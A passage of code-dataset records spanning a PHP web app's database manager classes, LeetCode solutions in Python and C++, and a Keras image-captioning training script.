$count;\n\t\t}\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.5045871734619141,
"alphanum_fraction": 0.5045871734619141,
"avg_line_length": 11,
"blob_id": "e7fbc0fdfb3660392c10e918a1f2a0bc102ee9f8",
"content_id": "c057990ddb82eaa71387b69bddaf1eac37356ffb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/web/admin/admin.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "\n\n<?php\n\trequire_once(\"../_header.php\");\n?>\n\n\t<!-- Admin Page -->\n\t\n<?php\n\trequire_once(\"../_footer.php\");\n?>"
},
{
"alpha_fraction": 0.5634028911590576,
"alphanum_fraction": 0.5640449523925781,
"avg_line_length": 24.120967864990234,
"blob_id": "d30e2b946edf318ba54001367408870b72d10818",
"content_id": "4f93d978aee9bfc3aa243bb7ddf3e4fc7c112ef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3115,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 124,
"path": "/web/tools/ScrapeurlsManager.class.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?\n\n\trequire_once(\"DatabaseTool.class.php\");\n\n\tclass ScrapeurlsManager\n\t{\n\t\tfunction add($url,$name,$organizationid,$enabled)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'INSERT INTO scrapeurls(url,name,organizationid,enabled) VALUES(?,?,?,?)';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"ssss\", $url,$name,$organizationid,$enabled);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction get($scrapeurlid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM scrapeurls WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$row = $results[0];\n\t\t\t\t$retVal = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retVal;\n\t\t}\n\n\t\tfunction getall()\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'SELECT * FROM scrapeurls';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\t\t\n\t\t\t\t$retArray = array();\n\t\t\t\tforeach( $results as $row )\n\t\t\t\t{\n\t\t\t\t\t$object = (object) array('scrapeurlid' => $row['scrapeurlid'],'url' => $row['url'],'name' => $row['name'],'organizationid' => $row['organizationid'],'enabled' => $row['enabled']);\n\t\t\t\t\t$retArray[] = $object;\n\t\t\t\t}\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t\n\t\t\treturn $retArray;\n\t\t}\n\n\t\tfunction del($scrapeurlid)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'DELETE FROM scrapeurls WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"s\", $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . $e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\tfunction update($url,$name,$organizationid,$enabled)\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\t$db = new DatabaseTool(); \n\t\t\t\t$query = 'UPDATE scrapeurls SET url = ?,name = ?,organizationid = ?,enabled = ? WHERE scrapeurlid = ?';\n\t\t\t\t$mysqli = $db->Connect();\n\t\t\t\t$stmt = $mysqli->prepare($query);\n\t\t\t\t$stmt->bind_param(\"sssss\", $url,$name,$organizationid,$enabled, $scrapeurlid);\n\t\t\t\t$results = $db->Execute($stmt);\n\t\n\t\t\t\t$db->Close($mysqli, $stmt);\n\t\t\t}\n\t\t\tcatch (Exception $e)\n\t\t\t{\n\t\t\t\terror_log( \"Caught exception: \" . 
$e->getMessage() );\n\t\t\t}\n\t\t}\n\n\t\t///// Application Specific Functions\n\n\t}\n\n?>\n"
},
{
"alpha_fraction": 0.553398072719574,
"alphanum_fraction": 0.553398072719574,
"avg_line_length": 10.55555534362793,
"blob_id": "c0412ccd612d629f164d168c39e84d066013bb75",
"content_id": "e5e72cb454f2453809a568709c6869314111ebb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/web/_template.php",
"repo_name": "hhroc/monroeminutes",
"src_encoding": "UTF-8",
"text": "<?php\n\trequire_once(\"_header.php\");\n?>\n\n\t<!-- Put Code Here -->\n\n<?php\n\trequire_once(\"_footer.php\");\n?>"
}
] | 26 |
Clarksh/leetcode | https://github.com/Clarksh/leetcode | c2e3b11a7c44e484616ac5646c013e81c0a7b018 | 3e5c3044b0f6dde3400b41f3b7f7dbca986e5067 | d94da99ac189f93fff2ae28f1a0060cbe345070b | refs/heads/master | 2020-04-19T04:50:25.728162 | 2019-08-21T12:48:19 | 2019-08-21T12:48:19 | 167,972,300 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5728155374526978,
"alphanum_fraction": 0.5776699185371399,
"avg_line_length": 35.54545593261719,
"blob_id": "ab67daeaca821e8b43b7a40b262ebad8bcd7cb08",
"content_id": "910e5c441da1b3363a8a7ce7061ba151b534f5a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 22,
"path": "/148_Sort List.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def sortList(self, head: ListNode) -> ListNode:\r\n if not (head and head.next): return head\r\n fast, slow = head.next, head #\r\n while fast and fast.next:\r\n fast, slow = fast.next.next, slow.next # 遍历时候 快指针走两步,慢指针走一步\r\n # 当快指针走到终点,慢指针就到中点,截断链表\r\n mid, slow.next = slow, None\r\n left = self.sortList(head)\r\n right = self.sortList(mid)\r\n\r\n return self.merge2Lists(left, right)\r\n\r\n def merge2Lists(self, left: ListNode, right: ListNode) -> ListNode:\r\n if not left: return right\r\n if not right: return left\r\n if left.val < right.val:\r\n left.next = self.merge2Lists(left.next, right)\r\n return left\r\n else:\r\n right.next = self.merge2Lists(left, right.next)\r\n return right"
},
{
"alpha_fraction": 0.44897958636283875,
"alphanum_fraction": 0.46448978781700134,
"avg_line_length": 37.58064651489258,
"blob_id": "70954b500663a59e408e38107bfffdb38f78e389",
"content_id": "7b19d98d41bc7e538d34e8d706a779ab8fbb51df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1471,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 31,
"path": "/215_Kth Largest Element in an Array.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "GB18030",
"text": "class Solution:\r\n def findKthLargest(self, nums: List[int], k: int) -> int:\r\n # 调整堆\r\n def adjust_heap(lists, i, size):#以i为根节点开始调整成以i为根节点的最大堆\r\n lchild = 2 * i + 1#堆是完全二叉树,可求左右子树\r\n rchild = 2 * i + 2\r\n max = i\r\n if i < size / 2:#完全二叉树的分支节点(就是有叶子节点的)小于等了size/2\r\n if lchild < size and lists[lchild] > lists[max]:\r\n max = lchild\r\n if rchild < size and lists[rchild] > lists[max]:\r\n max = rchild\r\n if max != i:#如果根节点不是最大就调换位置\r\n lists[max], lists[i] = lists[i], lists[max]\r\n adjust_heap(lists, max, size)#然后以max为根节点进行调整\r\n\r\n # 创建堆\r\n def build_heap(lists, size):#从下往上构建堆\r\n for i in range(0, int(size/2))[::-1]:\r\n adjust_heap(lists, i, size)\r\n \r\n size = len(nums)\r\n build_heap(nums,size)#先创建堆\r\n count = 0\r\n for i in range(0, size)[::-1]:#i从size-1到1\r\n nums[0], nums[i] = nums[i], nums[0]#交换堆顶和堆底\r\n count += 1 #获得一个最大值加1\r\n if count == k:\r\n #print(nums[i])\r\n return nums[i]\r\n adjust_heap(nums, 0, i)#把剩下的重新排"
},
{
"alpha_fraction": 0.5469292998313904,
"alphanum_fraction": 0.5550405383110046,
"avg_line_length": 31.269229888916016,
"blob_id": "00d6c5659e5b5929b16bfa1c0ac6fb331c055f4d",
"content_id": "22d9c937688f0d5b69dd5d3757fa6de6cb3f673f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 26,
"path": "/23_Merge k Sorted Lists.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\r\n if not lists: return\r\n num = len(lists) # 遍历数组,看有多少有序链表\r\n if num == 1:\r\n return lists[0]\r\n mid = int(num / 2)\r\n left = self.mergeKLists(lists[:mid])\r\n right = self.mergeKLists(lists[mid:])\r\n return self.merge2Lists(left, right)\r\n\r\n def merge2Lists(self, left, right): # 将两个有序链表合成一个有序链表\r\n if not left: return right\r\n if not right: return left\r\n if left.val < right.val:\r\n left.next = self.merge2Lists(left.next, right)\r\n return left\r\n else:\r\n right.next = self.merge2Lists(left, right.next)\r\n return right"
},
{
"alpha_fraction": 0.450236976146698,
"alphanum_fraction": 0.4644549787044525,
"avg_line_length": 22.823530197143555,
"blob_id": "9878e42f10efcede6030aec0e85424a24ca9d7ad",
"content_id": "07871e21640ffdb486282604982931fd41f18ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/169_Majority Element.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "def majorityElement(nums):\r\n nums_set = set(nums) # 去重\r\n nums_dict = {}\r\n maj = len(nums) / 2\r\n for i in nums_set: # 初始化计数器\r\n nums_dict.update({i: 0})\r\n # print(nums_dict)\r\n for j in nums:\r\n nums_dict[j] += 1\r\n # print(nums_dict)\r\n for j in nums_set:\r\n if nums_dict[j] > maj:\r\n # print(j)\r\n return j\r\n\r\n\r\nmajorityElement([1, 1, 2])\r\n"
},
{
"alpha_fraction": 0.4585798680782318,
"alphanum_fraction": 0.4674556255340576,
"avg_line_length": 32,
"blob_id": "2bd2fdf70e049b56144ed1e35adb8cc837e2aec8",
"content_id": "eb8318ce094a6c2ec3b1cf2baaf4be47bca9d7dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/78_Subsets.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def subsets(self, nums: List[int]) -> List[List[int]]:\r\n result = [[]]\r\n # result[0] = []\r\n # if len(num) == 0:\r\n # return result\r\n for i in range(0,len(nums)):\r\n # 添加 新元素 和之前旧元素的集合\r\n result = result + [[nums[i]] + j for j in result]\r\n return result"
},
{
"alpha_fraction": 0.5090634226799011,
"alphanum_fraction": 0.5317220687866211,
"avg_line_length": 31.200000762939453,
"blob_id": "c6c056be76d8d76639578dfb3ec6f70540891810",
"content_id": "ad15fb4cd69efe410a4804ec4cce2029149ba6ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 20,
"path": "/104_Maximum Depth of Binary Tree.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# https://blog.csdn.net/Findingxu/article/details/99640572\r\n\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def maxDepth(self, root: TreeNode) -> int:\r\n queue = [(root,0)] #初始化,里面放元组\r\n while(queue):\r\n node,depth = queue.pop(0) # 返回的不是元组(root,0),而是两个元素\r\n if node:\r\n queue.append((node.left,depth+1))\r\n queue.append((node.right,depth+1))\r\n #queue.extend([(node.left,depth+1),(node.right,depth+1)])\r\n else:\r\n return depth"
},
{
"alpha_fraction": 0.451127827167511,
"alphanum_fraction": 0.45864662528038025,
"avg_line_length": 28.846153259277344,
"blob_id": "74b2bf714c3150827893b1564664da3bc293aeab",
"content_id": "7c7db6b13317c6f12cdad30089b5b32cda8f9da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/136_Single Number.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def singleNumber(self, nums: List[int]) -> int:\r\n nums_set = set(nums) #去重\r\n nums_dict = {}\r\n for i in nums_set:#初始化计数器\r\n nums_dict.update({i:0})\r\n # print(nums_dict)\r\n for j in nums:\r\n nums_dict[j] += 1\r\n # print(nums_dict)\r\n for j in nums_set:\r\n if nums_dict[j] == 1 :\r\n return j"
},
{
"alpha_fraction": 0.44186046719551086,
"alphanum_fraction": 0.4790697693824768,
"avg_line_length": 22,
"blob_id": "22898e863efc1c2bbd9d4ba6f4cfd1be6a6fc200",
"content_id": "3e6f6bad0ca9081430ce4a5deed07d5f3ee45565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 18,
"path": "/213_Power ofTwo.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# https://blog.csdn.net/Findingxu/article/details/99633998\r\n\r\n#迭代法\r\nclass Solution:\r\n def isPowerOfTwo(self, n: int) -> bool:\r\n if n<= 0 :\r\n return False\r\n while n>1: \r\n if n%2 == 0:\r\n n //=2 # 除得整数\r\n else:\r\n return False\r\n return True\r\n\r\n#位运算\r\nclass Solution:\r\n def isPowerOfTwo(self, n: int) -> bool:\r\n return n>0 and n&(n-1) == 0"
},
{
"alpha_fraction": 0.5784860849380493,
"alphanum_fraction": 0.5896414518356323,
"avg_line_length": 32.86111068725586,
"blob_id": "b8fcd9dae5947ec3f0f633f00dc468398f60b19e",
"content_id": "e68ea78534029b464f181411b1bb98cfd96f81e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1703,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 36,
"path": "/124_Binary Tree Maximum Path Sum.cpp",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "\r\n/**\r\n * Definition for a binary tree node.\r\n * struct TreeNode {\r\n * int val;\r\n * TreeNode *left;\r\n * TreeNode *right;\r\n * TreeNode(int x) : val(x), left(NULL), right(NULL) {}\r\n * };\r\n */\r\n //博客分析 https://blog.csdn.net/Findingxu/article/details/99649130\r\nclass Solution {\r\npublic:\r\n int maxPathSum(TreeNode* root) {\r\n int maxSum = INT_MIN;\r\n maxPSum(root,maxSum); //递归一定要把参数 maxSum带上\r\n return maxSum; \r\n }\r\n int maxPSum(TreeNode* root,int &sumMax){ //加上&\r\n if(root == NULL) //确保递归函数有终止条件\r\n return 0;\r\n //左边最大值,右边最大值\r\n int leftMax = maxPSum(root->left,sumMax); // 调用递归求得子问题\r\n int rightMax = maxPSum(root->right,sumMax);\r\n // 下面两种方式都要当前根节点参与进来 \r\n //方式一:如果路径跨越左右子树\r\n int passRoot = root->val + max(0,leftMax) + max(0,rightMax); //跟0比,如果小于0就不要带上\r\n //方式二:如果路径只在一边\r\n //使用该种方式进行递归,保证从底至当前节点拥有单条路径,不分叉,这样leftMax和rightMax才能获得各自单条不分叉路线,才可以拼接成方式一\r\n int noRoot = root->val + max(0,max(leftMax,rightMax)); \r\n //sumMax里面已经包含了当前root的历史最大值,只有当根节点参与进来的两种方式得到更大值,才会更新sumMax\r\n sumMax = max(sumMax,max(passRoot,noRoot)); \r\n \r\n //return sumMax; //出错,说明还没有很了解递归\r\n return noRoot; // 递归只能通过第二种方式\r\n }\r\n};"
},
{
"alpha_fraction": 0.4884868562221527,
"alphanum_fraction": 0.49013158679008484,
"avg_line_length": 25.636363983154297,
"blob_id": "745f0fd17d0be4b43938390dae009fdff01f5a80",
"content_id": "f12c4a74001a0b5d66df13ade79395cda6acf2f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 22,
"path": "/230_Kth Smallest Element in a BST.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n def kthSmallest(self, root: TreeNode, k: int) -> int:\r\n \"\"\"\r\n :type root: TreeNode\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n \r\n def inorderTraversal(node):\r\n if not node:\r\n return []\r\n return inorderTraversal(node.left) + [node.val] + inorderTraversal(node.right)\r\n \r\n l = inorderTraversal(root)\r\n return l[k - 1]\r\n"
},
{
"alpha_fraction": 0.29735034704208374,
"alphanum_fraction": 0.3081452548503876,
"avg_line_length": 29.90625,
"blob_id": "2cd50b6a4adbedc239c5e6c070a75182ca395eb2",
"content_id": "944810de6565dd4fd640b16c5ae952a0401a3d82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1116,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 32,
"path": "/20_Valid_Parentheses.py",
"repo_name": "Clarksh/leetcode",
"src_encoding": "UTF-8",
"text": "class Solution:\r\n def isValid(self,s: str)-> bool:#方法一\r\n stack = []\r\n p_dict = {'(':')','[':']','{':'}'}\r\n left = p_dict.keys()\r\n right = p_dict.values()\r\n #print(left,right)\r\n for i in s:\r\n #����������ѹ��ջ\r\n if i in left:\r\n #print('1111')\r\n stack.append(i)\r\n #������ҷ��ţ����ж��Ƿ�ջ��Ϊ��Ӧ�������\r\n if i in right:\r\n #print('2222')\r\n if stack:\r\n if p_dict[stack[-1]] == i:\r\n #print(i)\r\n stack.pop()\r\n else:\r\n return False\r\n else:\r\n return False\r\n \r\n return len(stack) == 0\r\n\r\n def isValid2(self,s: str) -> bool: #方法二\r\n while '()' in s or '[]' in s or '{}' in s:\r\n s = s.replace('()', '')\r\n s = s.replace('{}', '')\r\n s = s.replace('[]', '')\r\n return s == ''"
}
] | 11 |
Riya-tech/ARBIE_2020 | https://github.com/Riya-tech/ARBIE_2020 | e59499e573bc39ac7bd1837b37d44bbb15abecce | 1626fc5f3e28c76a4cde3716daf83b2a66f67e6b | f1b6ff496366391dd9794b540687def53aa5d6f0 | refs/heads/main | 2023-04-11T11:06:21.893001 | 2021-04-28T14:14:36 | 2021-04-28T14:14:36 | 351,678,241 | 0 | 0 | MIT | 2021-03-26T05:59:51 | 2021-03-26T06:02:04 | 2021-04-28T14:14:36 | Python | [
{
"alpha_fraction": 0.6186254024505615,
"alphanum_fraction": 0.6530545949935913,
"avg_line_length": 30.216161727905273,
"blob_id": "7862c68dd110fb7a2a69b174e81649417c32057c",
"content_id": "6b562cce08b87a35dd1a7fbe6b8d29c60704122e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15452,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 495,
"path": "/Software/arbie_image_captioning.py",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "import keras\nimport tensorflow as tf\nimport glob\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport pickle\nfrom tqdm import tqdm\nimport pandas as pd\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, Embedding, TimeDistributed, Dense, RepeatVector, Activation, Flatten\nfrom keras.layers import merge\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers.wrappers import Bidirectional\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing import image\nimport nltk\nimport os\n\ntoken = '../input/img-caption-data/Flickr8k_text/Flickr8k.token.txt'\ncaptions = open(token, 'r').read().strip().split('\\n')\n\n\nd = {}\nfor i, row in enumerate(captions):\n row = row.split('\\t')\n row[0] = row[0][:len(row[0])-2]\n if row[0] in d:\n d[row[0]].append(row[1])\n else:\n d[row[0]] = [row[1]]\n \nd['1000268201_693b08cb0e.jpg']\n\nimages = '../input/img-caption-data/Flickr8k_Dataset/Flicker8k_Dataset/'\nimg = glob.glob(images+'*.jpg')\nimg[:5]\n\ndef split_data(l):\n temp = []\n for i in img:\n if i[len(images):] in l:\n temp.append(i)\n return temp\n\ntrain_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.trainImages.txt'\ntrain_images = set(open(train_images_file, 'r').read().strip().split('\\n'))\ntrain_img = split_data(train_images)\nlen(train_img)\n\nval_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.devImages.txt'\nval_images = set(open(val_images_file, 'r').read().strip().split('\\n'))\nval_img = split_data(val_images)\nlen(val_img)\n\ntest_images_file = '../input/img-caption-data/Flickr8k_text/Flickr_8k.testImages.txt'\ntest_images = set(open(test_images_file, 'r').read().strip().split('\\n'))\ntest_img = split_data(test_images)\nlen(test_img)\n\nImage.open(train_img[0])\n\n\ndef preprocess_input(x):\n x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\ndef preprocess(image_path):\n img = image.load_img(image_path, target_size=(299, 299))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_input(x)\n return x\n\nplt.imshow(np.squeeze(preprocess(train_img[0])))\n\nmodel = InceptionV3(weights='imagenet')\n\nfrom keras.models import Model\n\nnew_input = model.input\nhidden_layer = model.layers[-2].output\n\nmodel_new = Model(new_input, hidden_layer)\n\ntryi = model_new.predict(preprocess(train_img[0]))\ntryi.shape\n\ndef encode(image):\n image = preprocess(image)\n temp_enc = model_new.predict(image)\n temp_enc = np.reshape(temp_enc, temp_enc.shape[1])\n return temp_enc\n\nencoding_train = {}\nfor img in tqdm(train_img):\n encoding_train[img[len(images):]] = encode(img)\n\nwith open(\"encoded_images_inceptionV3.p\", \"wb\") as encoded_pickle:\n pickle.dump(encoding_train, encoded_pickle)\n\nencoding_train = pickle.load(open('encoded_images_inceptionV3.p', 'rb'))\nencoding_train['3556792157_d09d42bef7.jpg'].shape\n\nencoding_test = {}\nfor img in tqdm(test_img):\n encoding_test[img[len(images):]] = encode(img)\n\nwith open(\"encoded_images_test_inceptionV3.p\", \"wb\") as encoded_pickle:\n pickle.dump(encoding_test, encoded_pickle)\n\nencoding_test = pickle.load(open('encoded_images_test_inceptionV3.p', 'rb'))\nencoding_test[test_img[0][len(images):]].shape\n\ntrain_d = {}\nfor i in train_img:\n if i[len(images):] in d:\n train_d[i] = d[i[len(images):]]\n\nprint(\"Length of train_d: \",len(train_d))\n\nval_d = {}\nfor i in val_img:\n if i[len(images):] in d:\n val_d[i] = 
d[i[len(images):]]\n \nprint(\"Length of val_d: \",len(val_d))\n\ntest_d = {}\nfor i in test_img:\n if i[len(images):] in d:\n test_d[i] = d[i[len(images):]]\n \nprint(\"Length of test_d: \",len(test_d))\n\ntrain_d[images+'3556792157_d09d42bef7.jpg']\n\n\ncaps = []\nfor key, val in train_d.items():\n for i in val:\n caps.append('<start> ' + i + ' <end>')\n\nwords = [i.split() for i in caps]\nunique = []\nfor i in words:\n unique.extend(i)\n \nunique = list(set(unique))\n\nwith open(\"unique.p\", \"wb\") as pickle_d:\n pickle.dump(unique, pickle_d)\n\nunique = pickle.load(open('unique.p', 'rb'))\nlen(unique)\n\n\nword2idx = {val:index for index, val in enumerate(unique)}\nword2idx['<start>']\n\nidx2word = {index:val for index, val in enumerate(unique)}\nidx2word[5553]\n\n\nmax_len = 0\nfor c in caps:\n c = c.split()\n if len(c) > max_len:\n max_len = len(c)\nmax_len\n\nlen(unique), max_len\n\nvocab_size = len(unique)\nvocab_size\n\n\nf = open('flickr8k_training_dataset.txt', 'w')\nf.write(\"image_id\\tcaptions\\n\")\n\nfor key, val in train_d.items():\n for i in val:\n f.write(key[len(images):] + \"\\t\" + \"<start> \" + i +\" <end>\" + \"\\n\")\n\nf.close()\n\ndf = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\\t')\nlen(df)\n\nc = [i for i in df['captions']]\nlen(c)\n\nimgs = [i for i in df['image_id']]\na = c[-1]\na, imgs[-1]\n\nfor i in a.split():\n print (i, \"=>\", word2idx[i])\n\nsamples_per_epoch = 0\nfor ca in caps:\n samples_per_epoch += len(ca.split())-1\n \nsamples_per_epoch\n\n\n\ndef data_generator(batch_size = 32):\n partial_caps = []\n next_words = []\n images = []\n \n df = pd.read_csv('flickr8k_training_dataset.txt', delimiter='\\t')\n df = df.sample(frac=1)\n iter = df.iterrows()\n c = []\n imgs = []\n for i in range(df.shape[0]):\n x = next(iter)\n c.append(x[1][1])\n imgs.append(x[1][0])\n\n\n count = 0\n while True:\n for j, text in enumerate(c):\n current_image = encoding_train[imgs[j]]\n for i in range(len(text.split())-1):\n count+=1\n \n partial = [word2idx[txt] for txt in text.split()[:i+1]]\n partial_caps.append(partial)\n \n n = np.zeros(vocab_size)\n n[word2idx[text.split()[i+1]]] = 1\n next_words.append(n)\n \n images.append(current_image)\n\n if count>=batch_size:\n next_words = np.asarray(next_words)\n images = np.asarray(images)\n partial_caps = sequence.pad_sequences(partial_caps, maxlen=max_len, padding='post')\n yield ([images, partial_caps], next_words)\n partial_caps = []\n next_words = []\n images = []\n count = 0\n\n\nembedding_size = 300\n\n\nimage_model = Sequential([\n Dense(embedding_size, input_shape=(2048,), activation='relu'),\n RepeatVector(max_len)\n ])\n\n\ncaption_model = Sequential([\n Embedding(vocab_size, embedding_size, input_length=max_len),\n LSTM(256, return_sequences=True),\n TimeDistributed(Dense(300))\n ])\n\ntype(image_model)\n\n# max_len = 40\nimage_in = keras.Input(shape=(2048,))\ncaption_in = keras.Input(shape=(max_len,))\n\n\n# image_in = Input(shape=(2048,))\n# caption_in = keras.Input(shape=(max_len, vocab_size))\ncaption_in = keras.Input(shape=(max_len,))\nmerged = keras.layers.concatenate([image_model(image_in), caption_model(caption_in)],axis=1)\nlatent = Bidirectional(LSTM(256, return_sequences=False))(merged)\nout = Dense(vocab_size, activation='softmax')(latent)\nfinal_model = Model([image_in, caption_in], out)\n\nfinal_model.compile(loss='categorical_crossentropy', optimizer=RMSprop(), metrics=['accuracy'])\n\nfinal_model.summary()\n\nsteps_per_epoch = 
samples_per_epoch//128\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=1)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.optimizer.lr = 1e-4\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=1)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, 